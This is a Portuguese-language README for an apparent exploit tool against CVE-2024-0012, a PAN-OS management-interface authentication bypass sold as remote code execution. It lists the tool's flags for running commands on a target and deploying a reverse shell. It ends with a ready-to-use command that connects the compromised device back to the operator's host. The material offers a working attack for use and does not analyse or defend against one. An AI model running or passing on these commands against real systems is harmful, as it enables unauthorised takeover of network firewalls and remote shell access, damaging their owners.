
CVE-2024-0012 PAN-OS: Bypass de Autenticação na Interface Web de Gerenciamento (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 é uma bypass de autenticação no software PAN-OS da Palo Alto Networks que permite que um atacante não autenticado com acesso à rede à interface web de gerenciamento obtenha privilégios de administrador PAN-OS para realizar ações administrativas, adulterar a configuração ou explorar outras vulnerabilidades de escalonamento de privilégio autenticado.

| ❗ Aviso |
|---|
| Este projeto foi criado principalmente para ser usado como uma ferramenta CLI independente. Executar este exploit como um serviço pode apresentar riscos de segurança. Recomenda-se usá-lo com cautela e com medidas de segurança adicionais. DWYOR |
python3 cve-2024-0012.py -h
Isso exibirá a ajuda da ferramenta. Aqui estão todas as opções que ela suporta.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
Comando de Reverse Shell.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444